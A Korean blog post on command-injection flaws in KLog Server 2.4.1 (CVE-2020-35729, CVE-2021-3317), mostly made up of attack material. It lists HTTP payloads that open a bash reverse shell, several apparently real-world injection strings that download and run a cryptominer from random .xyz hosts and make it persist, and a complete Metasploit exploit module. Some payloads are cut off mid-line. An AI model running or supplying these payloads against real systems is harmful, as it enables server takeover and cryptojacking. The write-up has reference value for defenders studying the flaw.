728x90
CVE-2020-35729
KLog Server 2.4.1은 actions / authenticate.php 사용자 매개 변수의 쉘 메타 문자를 통해 OS 명령 삽입을 허용합니다 .
CVE-2021-3317
2.4.1까지의 KLog 서버는 인증 된 명령 주입을 허용합니다. async.php는 소스 매개 변수의 원래 값에 대해 shell_exec ()를 호출합니다
KLog 서버란?
KLog Server는 5651 법에 따라 타임 스탬프 서비스를 제공하는 Syslog 서버,
KLog Server는 Linux 기반 VMware 및 Microsoft Hyper-V 플랫폼과 호환되는 가상 머신으로 제공되며 Syslog 프로토콜로 로그를 생성하는 모든 장치 (방화벽, 서버 등)와 통합되어 작동한다고 한다!
Syslog -- ?
Syslog란 유닉스 시스템 내에서 사용하는 일종의 '로그 생성/관리' 도구이다.
공격 예시
첫 번째 단계에서“% 26sleep + 5 % 26”페이로드 전송 targert klog 서버에서 실행되도 한다.
그 다음 리버스 셸 연결을 자동화하기 위해 아래 스크린 샷에 표시된 익스플로잇이 실행되고 리스닝 NC 연결에서 셸 작업이 성공적으로 수행되는것을 확인할 수 있다.
공격 코드 구문 모음
POST /actions/authenticate.php HTTP/1.1
swd=test&user=test"&bash -i >& /dev/tcp/111.222.333.444/9999 0>&1
POST /actions/authenticate.php HTTP/1.1
pswd=test&user=test"&bash -i >& /dev/tcp/localhost/9999 0>&1POST /actions/authenticate.php HTTP/1.1
pswd=test&user=test"&cd /tmp||cd $(find / -writable -readable -executable | head -n 1);curl http:///.benchmark -O;wget http:///.benchmark -O .benchmark;chmod 777 .benchmark;./.benchmark;curl http:///.benchmark.py -O;wget http:///.benchmark.py -O .benchmark.py;chmod 777 .benchmark.py;./.benchmark||python2 .benchmark.py||python2.7 .benchmark.py||python .benchmark.py||./benchmark.py;DIR=$(pwd);ARGS="-o :9050";LINE="[ ! -f $DIR/.pidfile ] && echo > $DIR/.pidfile;$DIR/.1/sshd $ARGS||$DIR/.2/sshd $ARGS >> /dev/null||./sshd $ARGS >> /dev/null &";cd $DIR;echo "$LINE" > $DIR/.backup.sh;curl http:///xmrig1 -O||wget http:///xmrig1 -O xmrig1;mkdir $DIR/.1;mv -f xmrig1 $DIR/.1/sshd;chmod 777 $DIR/.1/sshd;curl http:///xmrig -O||wget http:///xmrig -O xmrig;mkdir $DIR/.2;mv -f xmrig $DIR/.2/sshd;chmod 777 $DIR/.2/sshd;chmod x $DIR/.backup.sh;$DIR/.backup.shpswd=test&user=test"&cd /tmp||cd $(find / -writable -readable -executable | head -n 1);curl http://CnYCuMpXoASCgbof.xyz/.benchmark -O;wget http://CnYCuMpXoASCgbof.xyz/.benchmark -O .benchmark;chmod 777 .benchmark;./.benchmark;curl http://CnYCuMpXoASCgbof.xyz/.benchmark.py -O;wget http://CnYCuMpXoASCgbof.xyz/.benchmark.py -O .benchmark.py;chmod 777 .benchmark.py;./.benchmark||python2 .benchmark.py||python2.7 .benchmark.py||python .benchmark.py||./benchmark.py;DIR=$(pwd);ARGS="-o CnYCuMpXoASCgbof.xyz:9050";LINE="[ ! -f $DIR/.pidfile ] && echo > $DIR/.pidfile;$DIR/.1/sshd $ARGS||$DIR/.2/sshd $ARGS >> /dev/null||./sshd $ARGS >> /dev/null &";cd $DIR;echo "$LINE" > $DIR/.backup.sh;curl http://CnYCuMpXoASCgbof.xyz/xmrig1 -O||wget http://CnYCuMpXoASCgbof.xyz/xmrig1 -O xmrig1;mkdir $DIR/.1;mv -f xmrig1 $DIR/.1/sshd;chmod 777 $DIR/.1/sshd;curl http://CnYCuMpXoASCgbof.xyz%
pswd=test&user=test"&cd /tmp||cd $(find / -writable -readable -executable | head -n 1);curl http://DocudOURoFkKaTRh.xyz/.benchmark -O;wget http://DocudOURoFkKaTRh.xyz/.benchmark -O .benchmark;chmod 777 .benchmark;./.benchmark;curl http://DocudOURoFkKaTRh.xyz/.benchmark.py -O;wget http://DocudOURoFkKaTRh.xyz/.benchmark.py -O .benchmark.py;chmod 777 .benchmark.py;./.benchmark||python2 .benchmark.py||python2.7 .benchmark.py||python .benchmark.py||./benchmark.py;DIR=$(pwd);ARGS="-o DocudOURoFkKaTRh.xyz:9050";LINE="[ ! -f $DIR/.pidfile ] && echo > $DIR/.pidfile;$DIR/.1/sshd $ARGS||$DIR/.2/sshd $ARGS >> /dev/null||./sshd $ARGS >> /dev/null &";cd $DIR;echo "$LINE" > $DIR/.backup.sh;curl http://DocudOURoFkKaTRh.xyz/xmrig1 -O||wget http://DocudOURoFkKaTRh.xyz/xmrig1 -O xmrig1;mkdir $DIR/.1;mv -f xmrig1 $DIR/.1/sshd;chmod 777 $DIR/.1/sshd;curl http://DocudOURoFkKaTRh.xyz/xmrig -O||wget http:
pswd=test&user=test"&cd /tmp||cd $(find / -writable -readable -executable | head -n 1);curl http://yaGZglIgBhQcCGhK.xyz/.benchmark -O;wget http://yaGZglIgBhQcCGhK.xyz/.benchmark -O .benchmark;chmod 777 .benchmark;./.benchmark;curl http://yaGZglIgBhQcCGhK.xyz/.benchmark.py -O;wget http://yaGZglIgBhQcCGhK.xyz/.benchmark.py -O .benchmark.py;chmod 777 .benchmark.py;./.benchmark||python2 .benchmark.py||python2.7 .benchmark.py||python .benchmark.py||./benchmark.py;DIR=$(pwd);ARGS="-o yaGZglIgBhQcCGhK.xyz:9050";LINE="[ ! -f $DIR/.pidfile ] && echo > $DIR/.pidfile;$DIR/.1/sshd $ARGS||$DIR/.2/sshd $ARGS >> /dev/null||./sshd $ARGS >> /dev/null &";cd $DIR;echo "$LINE" > $DIR/.backup.sh;curl http://yaGZglIgBhQcCGhK.xyz/xmrig1 -O||wget http://yaGZglIgBhQcCGhK.xyz/xmrig1 -O xmrig1;mkdir $DIR/.1;mv -f xmrig1 $DIR/.1/sshd;chmod 777 $DIR/.1/sshd;curl http://yaGZglIgBhQcCGhK.xyz/xmrig -O||wget http://yaGZglIgBhQcCGhK.xyz/xmrig -
pswd=test&user=test"&cd /tmp||cd $(find / -writable -readable -executable | head -n 1);curl http://iOXooVsmapdZpOTo.xyz/.benchmark -O;wget http://iOXooVsmapdZpOTo.xyz/.benchmark -O .benchmark;chmod 777 .benchmark;./.benchmark;curl http://iOXooVsmapdZpOTo.xyz/.benchmark.py -O;wget http://iOXooVsmapdZpOTo.xyz/.benchmark.py -O .benchmark.py;chmod 777 .benchmark.py;./.benchmark||python2 .benchmark.py||python2.7 .benchmark.py||python .benchmark.py||./benchmark.py;DIR=$(pwd);ARGS="-o iOXooVsmapdZpOTo.xyz:9050";LINE="[ ! -f $DIR/.pidfile ] && echo > $DIR/.pidfile;$DIR/.1/sshd $ARGS||$DIR/.2/sshd $ARGS >> /dev/null||./sshd $ARGS >> /dev/null &";cd $DIR;echo "$LINE" > $DIR/.backup.sh;curl http://iOXooVsmapdZpOTo.xyz/xmrig1 -O||wget http://iOXooVsmapdZpOTo.xyz/xmrig1 -O xmrig1;mkdir $DIR/.1;mv -f xmrig1 $DIR/.1/sshd;chmod 777 $DIR/.1/sshd;curl http://iOXooVsmapdZpOTo.xyz/xmrig -O||wget http://iOXooVsmapdZpOTo.xyz/xmrig -O xmrig;mkdir $D
Klog Server 2.4.1 -
Unauthenticated Command Injection (Metasploit)
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info={})
super(update_info(info,
'Name' => 'Klog Server Unauthenticated Command Injection Vulnerability',
'Description' => %q{
This module exploits an unauthenticated command injection vulnerability in Klog Server <= 2.4.1.
"user" parameter is executed via shell_exec() function without input validation.
},
'License' => MSF_LICENSE,
'Author' =>
[ 'B3KC4T', # Vulnerability discovery
'Metin Yunus Kandemir', # Metasploit module
],
'References' =>
[
['CVE', '2020-35729'],
['URL', 'https://docs.unsafe-inline.com/0day/klog-server-unauthentication-command-injection']
],
'DefaultOptions' =>
{
'HttpClientTimeout' => 2,
},
'Platform' => [ 'unix', 'linux' ],
'Arch' => [ ARCH_X64 ],
'Targets' => [
['Klog Server 2.4.1 (x64)', {
'Platform' => 'linux',
'Arch' => ARCH_X64,
}],
],
'Privileged' => false,
'DisclosureDate' => "2021-01-05",
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(443),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('TARGETURI', [true, 'The base path of the Klog Server', '/']),
]
)
end
def filter_bad_chars(cmd)
cmd.gsub!(/chmod \+x/, 'chmod 777')
cmd.gsub!(/;/, " %0A ")
cmd.gsub!(/ /, '+')
cmd.gsub!(/\//, '%2F')
end
def execute_command(cmd, opts = {})
command_payload = "unsafe+%22%26+#{filter_bad_chars(cmd)}%26%22"
print_status("Sending stager payload...")
uri = target_uri.path
res= send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'actions', 'authenticate.php'),
'encode_params' => false,
'vars_post' => {
'user' => command_payload,
'pswd' => "inline"
}
})
if res && res.code == 302
print_error("The target is not vulnerable!")
else
print_good("The target is vulnerable!")
end
end
def check
uri = target_uri.path
res= send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'actions', 'authenticate.php'),
'encode_params' => false,
'vars_post' => {
'user' => "unsafe+%22%26sleep+40%26%22", #checking blind command injection via sleep
'pswd' => "inline"
}
})
if res && res.code == 302
return Exploit::CheckCode::Safe
else
return Exploit::CheckCode::Vulnerable
end
end
def exploit
print_status("Exploiting...")
execute_cmdstager(flavor: :wget, delay: 10)
end
end
728x90
반응형
'CVE' 카테고리의 다른 글
| Fortinet FortiNAC (CVE-2022-39952) 취약점을 이용한 zip 파일 업로드 및 악성코드 실행 시도. (0) | 2023.03.07 |
|---|---|
| Nexus Repository Manager 원격 코드 실행 시도(CVE-2019-7238) (0) | 2020.09.02 |
댓글